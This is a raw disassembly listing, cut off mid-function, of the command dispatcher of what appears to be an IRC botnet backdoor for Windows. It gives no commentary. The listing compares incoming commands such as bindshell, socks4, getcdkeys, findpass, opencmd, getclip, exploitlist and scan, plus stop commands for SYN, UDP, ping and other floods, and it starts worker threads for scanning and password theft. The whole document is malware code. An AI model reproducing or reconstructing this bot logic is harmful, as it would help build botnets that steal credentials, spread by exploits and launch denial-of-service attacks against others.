add eax, 5 push 4 push eax lea eax, [ebp+var_A0] push eax call sub_41B5F0 lea eax, [ebp+var_A0] push offset asc_42CE14 ; ")" push eax call sub_41C0F4 add esp, 1Ch cmp [ebp+var_A0], 30h jl short loc_40284A cmp [ebp+var_A0], 39h jle short loc_402860 loc_40284A: ; CODE XREF: sub_401ACD+D72j push 3 lea eax, [ebp+var_A0] push offset a63 ; "63" push eax call sub_41B5F0 add esp, 0Ch loc_402860: ; CODE XREF: sub_401ACD+D7Bj lea eax, [ebp+var_A0] push eax call sub_41B779 test eax, eax pop ecx jle short loc_402886 lea eax, [ebp+var_A0] push eax call sub_41B779 pop ecx mov [ebp+var_94], al jmp short loc_40289A ; --------------------------------------------------------------------------- loc_402886: ; CODE XREF: sub_401ACD+DA2j call sub_41B8E2 push 60h cdq pop ecx idiv ecx add dl, 20h mov [ebp+var_94], dl loc_40289A: ; CODE XREF: sub_401ACD+DB7j lea eax, [ebp+var_A0] mov [ebp+var_93], bl push eax call sub_41AFE0 mov [ebp+arg_20], eax push 0Ch lea eax, [ebp+var_A0] push ebx push eax call sub_41B590 mov eax, [ebp+arg_20] add eax, 6 push eax lea eax, [ebp+var_A0] push [ebp+arg_10] push eax call sub_41B5F0 lea eax, [ebp+var_94] push eax lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call sub_417EEF push edi push [ebp+arg_0] call sub_41B900 add esp, 30h jmp loc_4027FE ; --------------------------------------------------------------------------- loc_4028FB: ; CODE XREF: sub_401ACD+D33j mov edi, 1FFh lea eax, [ebp+var_4488] push edi push [ebp+arg_0] push eax call sub_41B5F0 lea eax, [ebp+var_4488] push edi push eax lea eax, [ebp+var_4AF0] push eax call sub_41B5F0 lea eax, [ebp+var_4AF0] push offset asc_42D128 ; " " push eax call sub_41C0F4 add esp, 20h mov [ebp+var_90], eax lea edi, [ebp+var_8C] mov [ebp+arg_10], 1Fh loc_40294B: ; CODE XREF: sub_401ACD+E93j push offset asc_42D128 ; " " push ebx call sub_41C0F4 mov [edi], eax pop ecx add edi, 4 dec [ebp+arg_10] pop ecx jnz short loc_40294B mov ecx, [ebp+esi+var_90] lea eax, [ebp+esi+var_90] cmp ecx, ebx jz loc_401E94 add ecx, 3 mov [eax], ecx loc_40297D: ; CODE XREF: sub_401ACD+CB9j mov edi, [ebp+esi+var_90] push edi push offset aRndnick ; "rndnick" mov [ebp+arg_8], edi call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409803 push edi push offset aRn ; "rn" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409803 push edi push offset aDie ; "die" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4049FD push edi push offset aD ; "d" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4049FD push edi push offset aLogout ; "logout" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404955 push edi push offset aLo ; "lo" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404955 push edi push offset aVersion ; "version" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404946 push edi push offset aVer ; "ver" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404946 push edi push offset aDedication ; "dedication" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40493C push edi push offset aDed ; "ded" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40493C push edi push offset aSpeedtest ; "speedtest" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404923 push edi push offset aSt ; "st" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404923 push edi push offset aSecure ; "secure" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404825 push edi push offset aSec ; "sec" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404825 push edi push offset aUnsecure ; "unsecure" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404825 push edi push offset aUnsec ; "unsec" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404825 push edi push offset aBindshell ; "bindshell" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40471F push edi push offset aBd ; "bd" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40471F push edi push offset aBindshellstop ; "bindshellstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402B41 push [ebp+esi+var_8C] push 6 push offset aServer_0 ; "Server" push offset dword_42CD68 loc_402B25: ; CODE XREF: sub_401ACD+10C2j ; sub_401ACD+10E8j ... push [ebp+var_8] push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_40B385 add esp, 20h jmp loc_401E94 ; --------------------------------------------------------------------------- loc_402B41: ; CODE XREF: sub_401ACD+1043j push edi push offset aSocks4 ; "socks4" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045FD push edi push offset aS4 ; "s4" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045FD push edi push offset aSocks4stop ; "socks4stop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402B91 push [ebp+esi+var_8C] push 19h push offset aServer_0 ; "Server" push offset dword_42CD40 jmp short loc_402B25 ; --------------------------------------------------------------------------- loc_402B91: ; CODE XREF: sub_401ACD+10ADj push edi push offset aRloginstop ; "rloginstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402BBA push [ebp+esi+var_8C] push 9 push offset aServer_0 ; "Server" push offset dword_42CD24 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402BBA: ; CODE XREF: sub_401ACD+10D3j push edi push offset aHttpstop ; "httpstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402BE3 push [ebp+esi+var_8C] push 3 push offset aServer_0 ; "Server" push offset dword_42CD08 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402BE3: ; CODE XREF: sub_401ACD+10FCj push edi push offset aLogstop ; "logstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402C0C push [ebp+esi+var_8C] push 25h push offset dword_42CCF4 push offset dword_42CCE8 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402C0C: ; CODE XREF: sub_401ACD+1125j push edi push offset aRedirectstop ; "redirectstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402C35 push [ebp+esi+var_8C] push 18h push offset dword_42CCC8 push offset dword_42CCB8 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402C35: ; CODE XREF: sub_401ACD+114Ej push edi push offset dword_42CCAC call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402C5E push [ebp+esi+var_8C] push 0Dh push offset dword_42CCA0 push offset dword_42CC94 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402C5E: ; CODE XREF: sub_401ACD+1177j push edi push offset aSynstop ; "synstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402C87 push [ebp+esi+var_8C] push 0Eh push offset dword_42CC80 push offset dword_42CC74 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402C87: ; CODE XREF: sub_401ACD+11A0j push edi push offset aSkysynstop ; "skysynstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402CB0 push [ebp+esi+var_8C] push 10h push offset dword_42CC58 push offset dword_42CC48 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402CB0: ; CODE XREF: sub_401ACD+11C9j push edi push offset aTarga3stop ; "targa3stop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402CD9 push [ebp+esi+var_8C] push 11h push offset dword_42CC2C push offset dword_42CC1C jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402CD9: ; CODE XREF: sub_401ACD+11F2j push edi push offset aWonkstop ; "wonkstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402D02 push [ebp+esi+var_8C] push 12h push offset dword_42CC04 push offset dword_42CBF8 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402D02: ; CODE XREF: sub_401ACD+121Bj push edi push offset aPacketstop ; "packetstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_402E58 mov esi, [ebp+esi+var_8C] mov edi, [ebp+arg_4] push esi push 0Dh push offset dword_42CCA0 push offset dword_42CC94 push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 push esi push 0Eh push offset dword_42CC80 push offset dword_42CC74 push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 add esp, 40h push esi push 17h push offset dword_42CBE0 push offset dword_42CBD4 push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 push esi push 16h push offset dword_42CBC8 push offset dword_42CBBC push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 add esp, 40h push esi push 11h push offset dword_42CC2C push offset dword_42CC1C push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 push esi push 12h push offset dword_42CC04 push offset dword_42CBF8 push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 add esp, 40h push esi push 0Fh push offset dword_42CBAC push offset dword_42CB9C push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 push esi push 13h push offset dword_42CB8C push offset dword_42CB7C push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 add esp, 40h push esi push 10h push offset dword_42CC58 push offset dword_42CC48 push 1 push [ebp+var_4] push [ebp+var_88] push edi call sub_40B385 push ebx push [ebp+var_4] push offset unk_42CB48 push [ebp+var_88] push edi call sub_409A73 add esp, 34h jmp loc_401E94 ; --------------------------------------------------------------------------- loc_402E58: ; CODE XREF: sub_401ACD+1244j push edi push offset aTsunamistop ; "tsunamistop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402E81 push [ebp+esi+var_8C] push 0Fh push offset dword_42CBAC push offset dword_42CB9C jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402E81: ; CODE XREF: sub_401ACD+139Aj push edi push offset aWisdomstop ; "wisdomstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402EAA push [ebp+esi+var_8C] push 13h push offset dword_42CB8C push offset dword_42CB7C jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402EAA: ; CODE XREF: sub_401ACD+13C3j push edi push offset aUdpstop ; "udpstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402ED3 push [ebp+esi+var_8C] push 17h push offset dword_42CBE0 push offset dword_42CBD4 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402ED3: ; CODE XREF: sub_401ACD+13ECj push edi push offset aPingstop ; "pingstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402EFC push [ebp+esi+var_8C] push 16h push offset dword_42CBC8 push offset dword_42CBBC jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402EFC: ; CODE XREF: sub_401ACD+1415j push edi push offset aTftpstop ; "tftpstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402F25 push [ebp+esi+var_8C] push 5 push offset aServer_0 ; "Server" push offset dword_42CB00 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402F25: ; CODE XREF: sub_401ACD+143Ej push edi push offset aFindfilestop ; "findfilestop" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045E5 push edi push offset aFfstop ; "ffstop" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045E5 push edi push offset aProcsstop ; "procsstop" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045CD push edi push offset aPsstop ; "psstop" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045CD push edi push offset aClonestop ; "clonestop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402FA2 push [ebp+esi+var_8C] push 1Fh push offset aClone ; "Clone" push offset dword_42CAB0 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402FA2: ; CODE XREF: sub_401ACD+14BBj push edi push offset aSecurestop ; "securestop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402FCB push [ebp+esi+var_8C] push 22h push offset aSecure_0 ; "Secure" push offset dword_42CA8C jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402FCB: ; CODE XREF: sub_401ACD+14E4j push edi push offset aScanstop ; "scanstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_402FF4 push [ebp+esi+var_8C] push 0Bh push offset aScan_0 ; "Scan" push offset dword_42CA6C jmp loc_402B25 ; --------------------------------------------------------------------------- loc_402FF4: ; CODE XREF: sub_401ACD+150Dj push edi push offset aScanstats ; "scanstats" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045B7 push edi push offset aStats ; "stats" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045B7 push edi push offset aTransferstats ; "transferstats" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045A1 push edi push offset aTrstats ; "trstats" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4045A1 push edi push offset aConnectbacksta ; "connectbackstats" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40458B push edi push offset aCbstats ; "cbstats" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40458B push edi push offset aExploitlist ; "exploitlist" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404575 push edi push offset aExplist ; "explist" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404575 push edi push offset aReconnect ; "reconnect" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404556 push edi push offset aR ; "r" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404556 push edi push offset aDisconnect ; "disconnect" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404534 push edi push offset aDc ; "dc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404534 push edi push offset aQuit_0 ; "quit" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4044EC push edi push offset aQ ; "q" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4044EC push edi push offset aStatus ; "status" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4044D8 push edi push offset aS_1 ; "s" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4044D8 push edi push offset aId ; "id" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4044A1 push edi push offset aI ; "i" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4044A1 push edi push offset aReboot ; "reboot" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4031C0 call sub_418338 test eax, eax mov eax, offset unk_42C9A8 jnz short loc_403192 mov eax, offset unk_42C980 loc_403192: ; CODE XREF: sub_401ACD+16BEj push eax lea eax, [ebp+var_2C4] push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 1Ch jmp loc_4083BD ; --------------------------------------------------------------------------- loc_4031C0: ; CODE XREF: sub_401ACD+16B0j push edi push offset aThreads ; "threads" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4043C2 push edi push offset aT ; "t" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4043C2 push edi push offset aAliases ; "aliases" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40439F push edi push offset aAl ; "al" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40439F push edi push offset aLog ; "log" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4042AC push edi push offset aLg ; "lg" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4042AC push edi push offset aClearlog ; "clearlog" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404293 push edi push offset aClg ; "clg" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404293 push edi push offset aNetinfo ; "netinfo" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404259 push edi push offset aNi ; "ni" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_404259 push edi push offset aSysinfo ; "sysinfo" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40422E push edi push offset aSi ; "si" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40422E push edi push offset aLsp100 ; "lsp100" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4041F4 push edi push offset aLsp100 ; "lsp100" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4041F4 push edi push offset aProcs ; "procs" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4040D1 push edi push offset aPs ; "ps" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4040D1 push edi push offset aGetcdkeys ; "getcdkeys" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4040B3 push edi push offset aKey ; "key" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4040B3 push edi push offset aUptime ; "uptime" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40402B push edi push offset aUp ; "up" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40402B push edi push offset aDriveinfo ; "driveinfo" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40400E push edi push offset aDrv ; "drv" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40400E push edi push offset aTestdlls ; "testdlls" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403FF5 push edi push offset aDll ; "dll" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403FF5 push edi push offset aOpencmd ; "opencmd" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403FB6 push edi push offset aOcmd ; "ocmd" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403FB6 push edi push offset aCmdstop ; "cmdstop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40340B push [ebp+esi+var_8C] push 0Ah push offset dword_42C8C0 push offset dword_42C8B4 jmp loc_402B25 ; --------------------------------------------------------------------------- loc_40340B: ; CODE XREF: sub_401ACD+1924j push edi push offset dword_42C8B0 call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_403528 cmp [ebp+var_8], ebx jnz short loc_40343F push ebx push [ebp+var_4] push offset dword_42C89C push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_40343F: ; CODE XREF: sub_401ACD+1956j mov eax, [ebp+arg_18] mov [ebp+arg_20], ebx mov [ebp+arg_18], eax jmp short loc_40344D ; --------------------------------------------------------------------------- loc_40344A: ; CODE XREF: sub_401ACD+19CCj mov eax, [ebp+arg_18] loc_40344D: ; CODE XREF: sub_401ACD+197Bj cmp [eax], bl jz short loc_403454 inc eax jmp short loc_403459 ; --------------------------------------------------------------------------- loc_403454: ; CODE XREF: sub_401ACD+1982j mov eax, offset aEmpty ; "<Empty>" loc_403459: ; CODE XREF: sub_401ACD+1985j push eax lea eax, [ebp+var_2C4] push [ebp+arg_20] push offset aD_S ; "%d. %s" push eax call sub_41B886 push 1 lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add [ebp+arg_18], 80h add esp, 24h inc [ebp+arg_20] cmp [ebp+arg_20], 3 jl short loc_40344A push offset unk_42C868 call sub_4151AD pop ecx loc_4034A6: ; CODE XREF: sub_401ACD+1C5Bj ; sub_401ACD+2F44j mov eax, [ebp+esi+var_8C] cmp eax, ebx mov [ebp+arg_10], eax jz loc_401E94 push edi push offset aSpoof ; "spoof" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_404AF5 mov esi, [ebp+arg_10] push offset aOff ; "off" push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_404A23 lea eax, [ebp+var_2C4] push offset unk_42C834 push eax mov ds:dword_4CEE08, ebx call sub_41B886 pop ecx pop ecx loc_4034FE: ; CODE XREF: sub_401ACD+3023j cmp [ebp+var_8], ebx jnz loc_409855 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 loc_403520: ; CODE XREF: sub_401ACD+7119j add esp, 14h jmp loc_409855 ; --------------------------------------------------------------------------- loc_403528: ; CODE XREF: sub_401ACD+194Dj push edi push offset aGetclip ; "getclip" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403F75 push edi push offset aGc ; "gc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403F75 push edi push offset aFlusharp ; "flusharp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403F5E push edi push offset aFarp ; "farp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403F5E push edi push offset aFlushdns ; "flushdns" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403F26 push edi push offset aFdns ; "fdns" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403F26 push edi push offset aCurrentip ; "currentip" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403EEC push edi push offset aCip ; "cip" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403EEC push edi push offset aRloginserver ; "rloginserver" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403DB1 push edi push offset aRlogin ; "rlogin" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403DB1 push edi push offset aHttpserver ; "httpserver" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403C25 push edi push offset aHttp ; "http" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403C25 push edi push offset aTftpserver ; "tftpserver" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403AEB push edi push offset aTftp ; "tftp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_403AEB push edi push offset aCrash ; "crash" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4036B4 lea eax, [ebp+var_2C4] push offset dword_42C78C push eax call sub_41B886 cmp [ebp+var_8], ebx pop ecx pop ecx jnz short loc_403693 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_403693: ; CODE XREF: sub_401ACD+1BA8j lea eax, [ebp+var_2C4] push eax call sub_4151AD mov [esp+10h+var_10], offset aCrash ; "crash" push [ebp+esi+var_7C] call sub_41C070 jmp loc_40207C ; --------------------------------------------------------------------------- loc_4036B4: ; CODE XREF: sub_401ACD+1B90j push edi push offset aAsc ; "asc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4037E7 push edi push offset aSa ; "sa" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4037E7 push edi push offset aPhonehome ; "phonehome" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_403708 lea eax, [ebp+var_C4] push eax push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n" push [ebp+arg_4] call sub_409A2D jmp loc_401F52 ; --------------------------------------------------------------------------- loc_403708: ; CODE XREF: sub_401ACD+1C20j push edi push offset aFindpass ; "findpass" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_40372E push edi push offset aFp ; "fp" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4034A6 loc_40372E: ; CODE XREF: sub_401ACD+1C4Aj push [ebp+var_88] lea eax, [ebp+var_F54] push 80h push eax call sub_41B980 mov eax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_F58], eax mov eax, [ebp+var_4] mov [ebp+var_ED0], eax mov eax, [ebp+var_8] mov [ebp+var_ECC], eax push offset unk_42C720 lea eax, [ebp+var_2C4] push 200h push eax call sub_41B980 push ebx lea eax, [ebp+var_2C4] push 26h push eax call sub_40B0F7 add esp, 18h mov [ebp+var_ED4], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_F58] push ebx push eax push offset sub_416F1B push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_ED4] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_4037D6 loc_4037C0: ; CODE XREF: sub_401ACD+1D07j cmp [ebp+var_EC8], ebx jnz loc_4083BD push 32h call dword_427078 ; Sleep jmp short loc_4037C0 ; --------------------------------------------------------------------------- loc_4037D6: ; CODE XREF: sub_401ACD+1CF1j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42C6E4 jmp loc_4083AE ; --------------------------------------------------------------------------- loc_4037E7: ; CODE XREF: sub_401ACD+1BF6j ; sub_401ACD+1C0Bj mov al, byte_431CE2 mov [ebp+arg_0], ebx cmp al, bl mov edx, offset byte_431CE2 jz loc_401E94 mov ecx, edx loc_4037FE: ; CODE XREF: sub_401ACD+1D39j inc [ebp+arg_0] add ecx, 0Bh cmp [ecx], bl jnz short loc_4037FE cmp al, bl jz loc_401E94 mov [ebp+arg_18], edx mov esi, offset aF ; "#f" loc_403818: ; CODE XREF: sub_401ACD+2009j push 0Bh call sub_40B33F pop ecx mov ecx, eax mov eax, 190h cdq idiv [ebp+arg_0] add eax, ecx cmp eax, 1F4h jle short loc_403867 push ecx lea eax, [ebp+var_2C4] push offset unk_42C6A4 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 20h jmp loc_403ACD ; --------------------------------------------------------------------------- loc_403867: ; CODE XREF: sub_401ACD+1D65j or [ebp+var_730], 0FFFFFFFFh cmp dword_431B00, ebx mov [ebp+var_734], 64h mov [ebp+var_748], 5 mov [ebp+var_744], 320h mov [ebp+arg_0], ebx jz short loc_4038D8 mov edi, offset dword_431B00 loc_40389C: ; CODE XREF: sub_401ACD+1DEDj mov eax, [ebp+arg_18] add eax, 0FFFFFFF6h push eax lea eax, [edi-28h] push eax call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_4038BE inc [ebp+arg_0] add edi, 40h cmp [edi], ebx jnz short loc_40389C jmp short loc_4038D8 ; --------------------------------------------------------------------------- loc_4038BE: ; CODE XREF: sub_401ACD+1DE3j mov eax, [ebp+arg_0] mov ecx, eax mov [ebp+var_730], eax shl ecx, 6 mov ecx, dword_431B00[ecx] mov [ebp+var_74C], ecx loc_4038D8: ; CODE XREF: sub_401ACD+1DC8j ; sub_401ACD+1DEFj cmp [ebp+var_74C], ebx jz loc_403AE1 push 10h lea eax, [ebp+var_2D4] pop edi push eax lea eax, [ebp+var_30C] push eax mov [ebp+var_2D4], edi push [ebp+arg_4] call ds:dword_4CB5F8 ; getsockname mov al, [ebp+var_8FF] push edi neg al sbb eax, eax and ax, 100h add eax, 0FFFFh and [ebp+var_308], eax push [ebp+var_308] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_860] push eax call sub_41B5F0 xor eax, eax cmp [ebp+var_8FF], bl push 30h setnz al inc eax inc eax mov edi, eax lea eax, [ebp+var_860] push eax call sub_41BE40 add esp, 14h cmp edi, ebx mov byte ptr [ebp+arg_24+3], bl jle short loc_403980 loc_40395E: ; CODE XREF: sub_401ACD+1EB1j cmp eax, ebx jz short loc_403980 mov byte ptr [eax], 78h lea eax, [ebp+var_860] push 30h push eax call sub_41BE40 inc byte ptr [ebp+arg_24+3] pop ecx pop ecx movsx ecx, byte ptr [ebp+arg_24+3] cmp ecx, edi jl short loc_40395E loc_403980: ; CODE XREF: sub_401ACD+1E8Fj ; sub_401ACD+1E93j mov eax, [ebp+arg_4] push [ebp+var_88] mov [ebp+var_750], eax mov eax, [ebp+var_4] mov [ebp+var_728], eax mov eax, [ebp+var_8] mov [ebp+var_724], eax mov edi, 80h lea eax, [ebp+var_850] push edi push eax mov [ebp+var_720], 1 call sub_41B980 push offset byte_43D808 push esi call sub_41C070 add esp, 14h test eax, eax jz short loc_4039E2 push esi lea eax, [ebp+var_7D0] push edi push eax call sub_41B980 add esp, 0Ch jmp short loc_4039E8 ; --------------------------------------------------------------------------- loc_4039E2: ; CODE XREF: sub_401ACD+1F00j mov [ebp+var_7D0], bl loc_4039E8: ; CODE XREF: sub_401ACD+1F13j cmp [ebp+var_720], ebx mov eax, offset aRandom ; "Random" jnz short loc_4039FA mov eax, offset aSequential ; "Sequential" loc_4039FA: ; CODE XREF: sub_401ACD+1F26j push [ebp+var_734] lea ecx, [ebp+var_860] push [ebp+var_744] push [ebp+var_748] push [ebp+var_74C] push ecx push eax lea eax, [ebp+var_2C4] push offset unk_42C624 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Bh push eax call sub_40B0F7 add esp, 2Ch mov [ebp+var_740], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_860] push ebx push eax push offset sub_40C33D push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_740] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_403A84 loc_403A72: ; CODE XREF: sub_401ACD+1FB5j cmp [ebp+var_71C], ebx jnz short loc_403A9F push 32h call dword_427078 ; Sleep jmp short loc_403A72 ; --------------------------------------------------------------------------- loc_403A84: ; CODE XREF: sub_401ACD+1FA3j call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_2C4] push offset unk_42C5E8 push eax call sub_41B886 add esp, 0Ch loc_403A9F: ; CODE XREF: sub_401ACD+1FABj cmp [ebp+var_8], ebx jnz short loc_403AC0 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_403AC0: ; CODE XREF: sub_401ACD+1FD5j lea eax, [ebp+var_2C4] push eax call sub_4151AD pop ecx loc_403ACD: ; CODE XREF: sub_401ACD+1D95j add [ebp+arg_18], 0Bh mov eax, [ebp+arg_18] cmp [eax], bl jnz loc_403818 jmp loc_401E94 ; --------------------------------------------------------------------------- loc_403AE1: ; CODE XREF: sub_401ACD+1E11j push offset unk_42C5B0 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_403AEB: ; CODE XREF: sub_401ACD+1B66j ; sub_401ACD+1B7Bj push 5 call sub_40B33F test eax, eax pop ecx jle short loc_403B01 push offset unk_42C590 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_403B01: ; CODE XREF: sub_401ACD+2028j mov eax, [ebp+esi+var_8C] cmp eax, ebx jz short loc_403B24 push eax mov edi, 104h lea eax, [ebp+var_2D50] push edi push eax call sub_41B980 add esp, 0Ch jmp short loc_403B38 ; 